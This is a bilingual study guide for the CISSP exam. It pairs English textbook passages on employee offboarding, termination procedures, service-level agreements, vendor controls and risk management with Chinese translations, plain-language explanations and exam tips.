The E in UEBA extends the analysis to include entity activities (i.e., devices, systems, networks, and applications) that take place but that are not necessarily directly linked or tied to a user's specific actions, but that can still correlate to a vulnerability, reconnaissance, intrusion, breach, or exploit occurrence. Information collected from UBA/UEBA monitoring can be used to improve personnel security policies, procedures, training, and related security oversight programs. Offboarding, Transfers, and Termination Processes Offboarding is the reverse of the onboarding process.

Offboarding is the removal of an employee's identity from the IAM system once that person has left the organization. But offboarding can also be an element used when an employee transfers to a new position at the same organization, especially when shifting between departments, facilities, or geographic locations. Personnel transfers may be treated as a termination/rehire rather than a personnel move. This depends on the organization's policies and the means they have determined to best manage this change.

Some of the elements that go into making the decision as to which procedure to use include whether the same user account will be retained, if their clearance will be adjusted, if their new work responsibilities are similar to the previous position, and if a “clean slate” account is required for auditing purposes in the new job position. When a full offboarding is going to occur, whether as part of a termination/rehire transfer, a retirement, or a termination, this can include disabling and/or deleting the user account, revoking certificates, canceling

中文直译 / 整理

举报的风险更高。 通过严格监控特殊权限和特权账户(如管理员、root 等账 户),也可以减少串通及其他权限滥用行为。 对于许多被视为敏感或关键的职位,尤其是在医疗、金融、政府和军事组织中, 可能需要对员工进行定期重新评估。 这一过程可能与个人入职时进行的原始背 景调查和审查一样彻底,也可能仅需执行几项特定检查,以确认其资质的一致 性,并调查是否存在任何新的不合格信息。 用户行为分析(UBA) 和 用户和实体行为分析(UEBA) 是指为实现某些 特定目标或目的而分析用户、主体、访客、客户等行为的概念。 E 在 UEBA 中 将分析范围扩展至包括 实体 活动(即设备、系统、网络和应用程序),这些活 动虽不一定直接与用户的特定行为相关联,但仍可能与漏洞、侦察、入侵、泄 露或利用事件相关联。 从 UBA/UEBA 监控中收集的信息可用于改进人员安全 政策、程序、培训及相关安全监督计划。 离职、调岗与终止流程 离职是入职流程的逆过程。 离职是指当员工离开组织后,将其身份从IAM系统 中移除。 但离职也可以在员工在同一组织内调岗时使用,尤其是在部门、设施 或地理区域之间调动时。 人员调动可能被视为终止后再雇佣,而非单纯的岗位 变动。

这取决于组织的政策以及其为最好地管理这一变更所确定的方式。 决定 采用哪种程序的部分因素包括:是否保留同一用户账户、是否调整其权限、新 工作职责是否与原岗位相似,以及新职位是否需要为审计目的创建一个“清空” 账户。 当发生完整的离职流程时,无论是作为终止/重新雇佣转移、退休还是终止的 一部分,这可能包括禁用和/或删除用户账户、撤销证书、取消

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

证书不是密钥本身,而是身份与公钥的可信绑定。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 09 / PDF P148

五大支柱与 CIA 三元组

先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

教材原文段落

access codes, and terminating other specifically granted privileges. It is common to deactivate the accounts of prior employees in order to retain the identity for auditing purposes for a few months. After the allotted time, if no incidents are discovered regarding the former employee's account, it can be deleted from the IAM completely. If the account is deleted prematurely, any logged events that are of a security concern no longer point to an actual account and thus can make tracking down further evidence of violations more complicated. An internal employee transfer should not be used to move a problem employee into a different department rather than firing them.

Consider the overall 5 Pillars of Information Security and benefit to the organization; if a person is not acceptable as an employee in one department, is it realistic to assume they would be in another? Rather than passing around the problem, the better option is to terminate the problematic employee, especially if direct training and coaching do not provide a resolution. The offboarding process may also include informing security guards and other physical facility and property access management personnel to disallow entry to the former employee in the future.

The procedures for onboarding and offboarding should be clearly documented to ensure consistency of application and compliance with regulations or contractual obligations. Disclosure of these policies may need to be a standard element of the hiring process. Numerous issues must be addressed when an employee must be terminated or offboarded. A strong relationship between the security department and HR is essential to maintain control and minimize risks during termination. Terminations are typically unpleasant processes for all involved. However, they might be elevated to a neutral experience when well planned and scripted.

The intent of a termination policy is to reduce the risk associated with employee termination while treating the person with respect. The termination meeting should take place with at least one witness, preferably a higher-level manager and/or a security guard. Once the employee has been informed of their release, they should be reminded of the liabilities and restrictions placed on the former employee based on the employment

中文直译 / 整理

访问码以及其他特别授予的权限。 通常会停用前员工的账户,以便在几个月内 保留其身份以供审计用途。 在规定时间结束后,如果未发现与前员工账户相关 的任何事件,则可以将其从IAM中完全删除。 如果账户被过早删除,任何与安 全相关的日志事件将不再指向实际账户,从而使得追踪进一步的违规证据更加 复杂。 内部员工调岗不应用于将问题员工调至其他部门,而非将其解雇。 应考虑信息安全管理的五大支柱及对组织的整体益处; 如果某人在一个 部门不可接受,是否合理假设其在另一个部门就能被接受? 与其将问题 推来推去,更好的做法是终止该问题员工的雇佣关系,尤其是当直接培 训和指导无法解决问题时。 离职流程还可能包括通知安保人员及其他物理设施和财产访问管理人员,以在 未来禁止前员工进入。 入职和离职程序应明确记录,以确保执行的一致性并符合法规或合同义务。 这 些政策的披露可能需要成为招聘流程的标准环节。 在员工必须被解雇或离职时,需处理诸多问题。 安全部门与人力资源部门之间 建立牢固的关系至关重要,以在解雇过程中保持控制并最小化风险。 解雇通常是对所有相关方而言都不愉快的过程。 然而,当经过周密计划和脚本 化时,它们可能被提升为中性的体验。

解雇政策的目的是在尊重员工的前提下, 降低与员工解雇相关的风险。 解雇面谈应至少有一名见证人在场,最好是一名 高级经理和/或一名保安。 一旦员工被告知其被解雇,应提醒他们根据雇佣协议、 保密协议和任何其他与安全相关的文件所承担的责任和限制

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“五大支柱与 CIA 三元组”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 10 / PDF P149

第 149 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

agreement, NDAs, and any other security-related documentation. During this meeting, all organization-specific identification, access, or security badges as well as devices, cards, keys, and access tokens should be collected (see Figure 2.1). The termination of an employee should be handled in a private and respectful manner. However, this does not mean that precautions should not be taken. FIGURE 2.1 Former employees must return all company property. For nonvoluntary terminations where there is a perceived risk of a confrontation, the termination process may need to be abrupt and attended by security guards.

Any need to resolve HR issues, retrieve company equipment, review NDAs, and so forth can be handled afterward through an attorney. For terminations that are expected to be professional and for voluntary separations (such as quitting, retiring, or taking extended leave), an additional process may be called an exit interview. An exit interview is normally done by an HR person who specializes in those interviews with the idea of learning from the employee's experience.

The purpose of an exit interview is to understand why the employee is leaving, what their perspective is of the organization (its personnel, culture, process, etc.), and what they suggest could be done to improve conditions for current and future employees. Information learned from an exit interview may assist the organization with retaining employees through employment improvements and process/policy changes.

中文直译 / 整理

协议、保密协议以及任何其他与安全相关的文件。 在此面谈期间,应收回所有 组织特定的识别证、访问证或安全徽章,以及设备、卡片、钥匙和访问令牌 (见图 2.1)。 员工的解雇应以私密且尊重的方式处理。 但这并不意味着不应 采取预防措施。 图 2.1前员工必须归还所有公司财产。 对于存在冲突风险的非自愿离职情况,离职流程可能需要突然进行,并由安 保人员陪同。 任何需要解决的人力资源问题、收回公司设备、审查保密协议 等事项,均可事后通过律师处理。 对于预期为专业性质的终止以及自愿离职(如辞职、退休或长期休假),可能 会额外进行一个称为离职面谈的过程。 一个离职面谈通常由专门负责此类面谈 的人力资源人员执行,目的是从员工的经验中吸取教训。 离职面谈的目的是了 解员工离职的原因、他们对组织(包括人员、文化、流程等)的看法,以及他 们对改善当前和未来员工工作条件的建议。 通过离职面谈获得的信息有助于组 织通过改善雇佣条件和调整流程/政策来留住员工。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 149 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 11 / PDF P150

第 150 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Whether an abrupt termination process is used or a cordial process was concluded, the now former employee should be escorted off the premises and not allowed to return to their work area without an escort for any reason. The following list includes some other security issues that should be handled as soon as possible: Remove or deactivate the employee's user account at the same time as or just before they are notified of being terminated. Make sure the employee returns any organizational equipment or supplies from their vehicle or home. Arrange for a security department member to accompany the released employee while they gather their personal belongings from the work area.

Inform all security personnel and anyone else who watches or monitors any entrance point to ensure that the former employee does not attempt to reenter the building without an escort.

中文直译 / 整理

无论采用的是突然终止流程还是友好的终止流程,离职员工都应由专人陪同离 开办公场所,且在任何情况下都不得在无专人陪同的情况下返回其工作区域。 以下列表包含一些其他安全问题,应尽快处理: 在通知员工被解雇的同时或之前,立即删除或停用其用户账户。 确保员工将其车辆或家中所有的组织设备或用品归还。 安排安全部门成员陪同离职员工,监督其从工作区域收集个人物品。 通知所有安保人员及其他任何监控出入口的人员,确保前员工在没有陪同 的情况下不得试图重新进入大楼。

小白解释

场景先行:你是公司的安全负责人,正在读第 150 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 150 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 12 / PDF P151

第 151 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Firing: Timing Is Everything Firing an employee has become a complex process. That's why you need a well-designed termination process. However, it must be followed correctly every time. Unfortunately, this doesn't always happen. You might have heard of some fiasco caused by a botched termination procedure.

Common examples include performing any of the following before the employee is officially informed of their termination (thus giving the employee prior warning of their termination): The IT department is requesting the return of a mobile device Deactivating a network user account Blocking a person's personal identification number (PIN) or smartcard for building entrance Revoking a parking pass Distributing a revised company organizational chart Positioning a new employee in their cubicle or workspace Allowing layoff information to be leaked to the media Vendor, Consultant, and Contractor Agreements and Controls Vendor, consultant, and contractor controls are used to define the levels of performance, expectation, compensation, and consequences for entities, persons, or organizations that are external to the primary organization.

Multiparty risk exists when several entities or organizations are involved in a project. The risk or threats are often due to the variations of objectives, expectations, timelines, budgets, and security priorities of those involved. Risk management is the processes of identifying risks, assessing those risks, then selecting responses to risks that need mitigation. The risk response strategies implemented by one party may in fact cause additional risks against or from another party.

Often a risk management governing body must be established to oversee the multiparty project and enforce consistent security parameters for the member entities, at least as their interactions relate to the project. firing:

中文直译 / 整理

时机决定一切 解雇员工已成为一个复杂的过程。 因此,您需要设计一套完善的离职流程。 然而,每次都必须正确执行该流程。 不幸的是,这并不总是能够做到。 您 可能听说过一些因离职程序处理不当而引发的丑闻。 常见例子包括在员工 正式被告知被解雇之前(从而提前泄露了其被解雇的消息)执行以下任何 一项操作: IT 部门要求归还移动设备 停用网络用户账户 阻止某人的个人识别码(PIN)或 智能卡用于进入大楼 撤销停车通行证 分发修订后的公司组织架构图 为新员工安排工位或工作空间 允许裁员信息泄露给媒体 供应商、顾问和承包商协议与控制 供应商、顾问和承包商控制用于定义与主要组织外部的实体、个人或组织相 关的绩效水平、期望、报酬及后果。 多方风险存在于多个实体或组织参与一个项目时。 这些风险或威胁通常源于参 与方在目标、期望、时间表、预算和安全优先级方面的差异。 风险管理是识别 风险、评估风险,然后选择需要缓解的风险应对措施的过程。 一方实施的风险 应对策略实际上可能对另一方引发额外的风险。 通常,必须建立一个风险管理 治理机构,以监督多方项目,并为各参与实体强制执行一致的安全参数,至少 在其与项目相关的互动中如此。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 151 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 13 / PDF P152

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

Using service-level agreements (SLAs) is a means to ensure that organizations providing services maintain an appropriate level of service agreed on by the service provider, vendor, or contractor and the customer organization. You'd be wise to put SLAs in place for any data circuits, applications, information processing systems, databases, or other critical components that are vital to your organization's continued viability. SLAs are important when using any type of third-party service provider, including cloud services. SLAs also commonly include financial and other contractual remedies that kick in if the agreement is not maintained.

For example, if a critical circuit is down for more than 15 minutes, the service provider might agree to waive all charges on that circuit for one week. SLAs and vendor, consultant, and contractor controls are an important part of risk reduction and risk avoidance. By clearly defining the expectations and penalties for external parties, everyone involved knows what is expected of them and what the consequences are in the event of a failure to meet those expectations. Although it may be very cost-effective to use outside providers for a variety of business functions or services, it does increase potential risk by expanding the potential attack surface and range of vulnerabilities.

SLAs should include a focus on protecting and improving security in addition to ensuring quality and timely services at a reasonable price. Some SLAs are set and cannot be adjusted, whereas, with others, you may have significant influence over their content. You should ensure that an SLA supports the tenets of your security policy and infrastructure rather than being in conflict with them, which could introduce weak points, vulnerabilities, or exceptions. Outsourcing is the term often used to describe the use of an external third party, such as a vendor, consultant, or contractor, rather than performing the task or operation in-house.

Outsourcing can be used as a risk response option known as transference or assignment (see the “Risk Responses” section later in this chapter). However, though the risk of operating a function internally is transferred to a third party, other risks are taken on by using a third party. This aspect needs to be evaluated as to whether it is a benefit or a consequence of the SLA. For more on service-level agreements (SLAs), see Chapter 16. Vendors, consultants, and contractors also represent an increase in the risk of trade secret theft or espionage.

Outsiders often lack organizational loyalty that internal employees typically have; thus, the temptation to take advantage of intellectual property access opportunities may seem easier or less of an

中文直译 / 整理

使用服务级别协议(SLAs)是一种确保提供服务的组织维持服务提供商、供 应商或承包商与客户组织商定的适当服务水平的手段。 对于任何对贵组织持续 运营至关重要的数据电路、应用程序、信息处理系统、数据库或其他关键组件, 您都应明智地建立SLAs。 在使用任何类型的第三方服务提供商时,包括云服 务,SLAs都非常重要。 SLAs通常还包括如果协议未得到遵守时生效的财务和 其他合同补救措施。 例如,如果关键电路中断超过15分钟,服务提供商可能会 同意免除该电路一周的所有费用。 服务等级协议(SLA)以及供应商、顾问和承包商的控制措施是降低和规避风 险的重要组成部分。 通过明确定义对外部方的期望和违约处罚,所有相关方都 清楚自己的责任以及未能达到期望时的后果。 虽然使用外部提供商来处理各种 业务功能或服务可能非常经济高效,但这会通过扩大潜在的攻击面和漏洞范围 而增加潜在风险。 服务等级协议应不仅关注以合理价格确保高质量和及时的服 务,还应着重于保护和提升安全性。 有些服务等级协议是固定的,无法调整, 而另一些则可能让您对其内容产生重大影响。

您应确保服务等级协议支持您的 安全政策和基础设施,而非与之冲突,以免引入薄弱环节、漏洞或例外情况。 外包 是常用于描述使用外部第三方(如供应商、顾问或承包商)而非内部执行 任务或操作的术语。 外包可作为一种风险应对策略,称为转移或分配(参见本 章后面“风险应对”部分)。 然而,尽管内部运营的风险被转移给了第三方, 但使用第三方也会带来其他风险。 这一方面需要评估其是服务等级协议的益处 还是后果。 有关服务等级协议(SLA)的更多信息,请参阅第16章。 供应商、顾问和承包商也增加了商业秘密被盗或间谍活动的风险。 外部人员通 常缺乏内部员工所具有的组织忠诚度; 因此,利用知识产权访问机会的诱惑可 能显得更容易或更不

小白解释

场景先行:你是公司的安全负责人,正在读第 152 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
学习单元 14 / PDF P153

安全治理:定方向、定责任、定监督

治理负责让安全和组织目标对齐,并形成可监督的体系。

教材原文段落

internal conflict to a perpetrator. For more on espionage, see Chapter 17, “Preventing and Responding to Incidents.” Some organizations may benefit from a vendor management system (VMS). A VMS is a software solution that assists with managing and procuring staffing services, hardware, software, and other needed products and services. A VMS can offer ordering convenience, order distribution, training, consolidated billing, and more. In regard to security, a VMS can potentially keep communications and contracts confidential, require encrypted and authenticated transactions, and maintain a detailed activity log of events related to vendors and suppliers.

A VMS is particularly valuable for organizations that work with a large number of vendors and require a centralized and systematic approach to vendor relationship management. A VMS helps enhance vendor performance, reduce costs, manage risks, and maintain compliance while fostering collaborative and productive relationships with external partners. Compliance is the act of conforming to or adhering to rules, policies, regulations, standards, or requirements. Compliance is an important concern of security governance.

Understand and Apply Risk Management Concepts Risk management is a detailed process of identifying factors that could damage or disclose assets, evaluating those factors in light of asset value and countermeasure cost, and implementing cost-effective solutions for mitigating or reducing risk. The overall process of risk management is used to develop and implement information security strategies that support the mission of the organization. The result of performing risk management for the first time is the skeleton of a security policy.

Subsequent risk management events are used to improve and sustain an organization's security infrastructure over time as internal and external conditions change. The primary goal of risk management is to reduce risk to an acceptable level. What that level actually is depends on the organization, the value of its assets, the size of its budget, and many other factors. One organization might consider something to be an acceptable risk, whereas another organization

中文直译 / 整理

内部冲突。 有关间谍活动的更多信息,请参阅第17章,“事件的预防与应对。 ” 一些组织可能从供应商管理系统(VMS)中受益。 VMS是一种软件解决方案, 可协助管理与采购人员服务、硬件、软件及其他所需产品和服务。 VMS可提供 订购便利性、订单分发、培训、统一计费等功能。 在安全性方面,VMS可潜在 地保持通信和合同的机密性,要求加密和经过身份验证的交易,并维护与供应 商相关的详细活动日志。 对于与大量供应商合作并需要集中化、系统化供应商 关系管理的组织而言,VMS尤为宝贵。 VMS有助于提升供应商绩效、降低成本、 管理风险并确保合规,同时促进与外部合作伙伴的协作和高效关系。 合规是指遵守规则、政策、法规、标准或要求的行为。 合规是安全 治理的重要关注点。 理解和应用风险管理概念 风险管理是一个详细的过程,包括识别可能损害或泄露资产的因素,根据资产 价值和控制措施成本评估这些因素,并实施成本效益高的解决方案以减轻或降 低风险。 整个风险管理过程用于制定和实施支持组织使命的信息安全策略。 首 次执行风险管理的结果是安全策略的雏形。 后续的风险管理活动则用于在内部 和外部条件变化时,持续改进和维护组织的安全基础设施。

风险管理的主要目标是将风险降低到可接受的水平。 这一水平具体是多少,取 决于组织自身、其资产的价值、预算规模以及许多其他因素。 一个组织可能认 为某种情况是可接受的风险,而另一个组织

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:治理负责让安全和组织目标对齐,并形成可监督的体系。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

机密性:机密性让该看的人能看,不该看的人看不到。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全治理:定方向、定责任、定监督”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

加密、访问控制、分类、培训都常用于保护机密性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
机密性 机密性让该看的人能看,不该看的人看不到。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 15 / PDF P154

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

might consider the very same thing to be an unreasonably high level of risk. It is impossible to design and deploy a totally risk-free environment; however, significant risk reduction is possible, often with modest effort. Risks to an IT infrastructure are not all computer-based. In fact, many risks come from non-IT sources. It is important to consider all possible risks when performing risk evaluation, including accidents, natural disasters, financial threats, civil unrest, pandemics, physical threats, technical exploitations, and social engineering attacks. Failing to evaluate and respond to all forms of risk properly will leave a company vulnerable.

Risk management is composed of two primary elements: Risk assessment or risk analysis is the examination of an environment for risks, evaluating each threat event as to its likelihood of occurring and the severity of the damage it would cause if it did occur, and assessing the cost of various countermeasures for each risk. This results in a sorted criticality prioritization of risks. From there, risk response takes over.

Risk response involves evaluating countermeasures, safeguards, and security controls using a cost/benefit analysis; adjusting findings based on other conditions, concerns, priorities, and resources; and providing a proposal of response options in a report to senior management. Based on management decisions and guidance, the selected responses can be implemented into the IT infrastructure and integrated into the security policy documentation. This activity is also known as risk reduction or risk mitigation, which is the overall goal of risk management. A concept related to risk management is risk awareness.

Risk awareness is the effort to increase the knowledge of risks within an organization. This includes understanding the value of assets, inventorying the existing threats that can harm those assets, and the responses selected and implemented to address the identified risk. Risk awareness helps to inform an organization about the importance of abiding by security policies and the consequences of security failures. Risk Terminology and Concepts Risk management employs a vast terminology that must be clearly understood. This section defines and discusses all the important risk-related terminology:

中文直译 / 整理

可能认为同样的情况属于不合理的高风险。 设计和部署一个完全无风险的环 境是不可能的; 然而,通过适度的努力,通常可以实现显著的风险降低。 IT基础设施的风险并非都来自计算机方面。 事实上,许多风险来自非IT来源。 在进行风险评估时,必须考虑所有可能的风险,包括事故、自然灾害、财务威 胁、社会动荡、流行病、物理威胁、技术利用和社会工程攻击。 未能正确评估 和应对所有形式的风险,将使公司处于脆弱状态。 风险管理由两个主要要素组成: 风险评估或风险分析是对环境进行风险检查,评估每个威胁事件发生的可 能性及其一旦发生所造成的损害严重程度,并评估针对每项风险的各种应 对措施的成本。 这将导致对风险进行排序的严重性优先级。 在此基础上, 风险响应开始发挥作用。 风险响应涉及使用成本/效益分析评估应对措施、防护措施和安全控制; 根 据其他条件、关注点、优先级和资源调整发现结果; 并向高级管理层提交 包含响应选项建议的报告。 基于管理层的决策和指导,选定的响应措施可 实施到IT基础设施中,并整合到安全策略文档中。 此活动也称为风险降低 或风险缓解,这是风险管理的总体目标。 与风险管理相关的概念是风险意识。

